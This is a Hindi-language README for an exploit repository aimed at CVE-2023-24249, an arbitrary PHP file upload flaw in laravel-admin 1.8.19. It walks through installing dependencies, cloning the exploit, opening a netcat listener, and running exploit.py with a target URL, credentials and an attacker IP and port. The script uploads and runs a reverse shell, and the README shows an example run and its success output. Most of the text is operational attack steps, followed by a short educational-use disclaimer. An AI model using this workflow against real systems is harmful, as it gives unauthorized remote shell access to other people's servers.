
CVE-2023-24249 के लिए शोषण स्क्रिप्ट - एक भेद्यता जो फ़ाइल अपलोड और कमांड इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है।
इस रिपॉजिटरी में CVE-2023-24249 के लिए एक एक्सप्लॉइट स्क्रिप्ट है, जो laravel-admin संस्करण 1.8.19 में पाई गई एक गंभीर कमजोरी है। यह कमजोरी मनमानी फ़ाइल अपलोड की अनुमति देती है, जिससे हमलावर एक क्राफ्ट किए गए PHP फ़ाइल के माध्यम से मनमाना कोड निष्पादित कर सकते हैं। यह एक्सप्लॉइट दर्शाता है कि कैसे एक हमलावर लक्ष्य एप्लिकेशन पर एक रिवर्स शेल अपलोड कर सकता है और उसे निष्पादित करके रिमोट एक्सेस प्राप्त कर सकता है।
CVE-2023-24249 laravel-admin v1.8.19 में एक मनमानी फ़ाइल अपलोड कमजोरी है। यह कमजोरी हमलावरों को मनमानी PHP फ़ाइलों को अपलोड और निष्पादित करने की अनुमति देती है, जिससे संभावित रिमोट कोड निष्पादन हो सकता है।
प्रदान की गई एक्सप्लॉइट स्क्रिप्ट CVE-2023-24249 के शोषण की प्रक्रिया को स्वचालित करती है। यह निम्नलिखित चरण करती है:
requests लाइब्रेरीbeautifulsoup4 लाइब्रेरीआवश्यक लाइब्रेरीज़ को pip का उपयोग करके इंस्टॉल करें:
pip install requests beautifulsoup4
रिपॉजिटरी क्लोन करें:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
अपनी मशीन पर एक लिसनर शुरू करें:
nc -lvnp <PORT>
एक्सप्लॉइट स्क्रिप्ट चलाएँ:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
<TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP>, और <YOUR_PORT> को उपयुक्त मानों से बदलें:
<TARGET_URL>: लक्ष्य एप्लिकेशन का URL।<USERNAME>: प्रमाणीकरण के लिए उपयोगकर्ता नाम।<PASSWORD>: प्रमाणीकरण के लिए पासवर्ड।<YOUR_IP>: रिवर्स शेल कनेक्शन प्राप्त करने के लिए आपका IP पता।<YOUR_PORT>: वह पोर्ट जिस पर आपका लिसनर चल रहा है।python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
यदि एक्सप्लॉइट सफल होता है, तो स्क्रिप्ट आउटपुट देगी:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना किसी भी सिस्टम के विरुद्ध इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।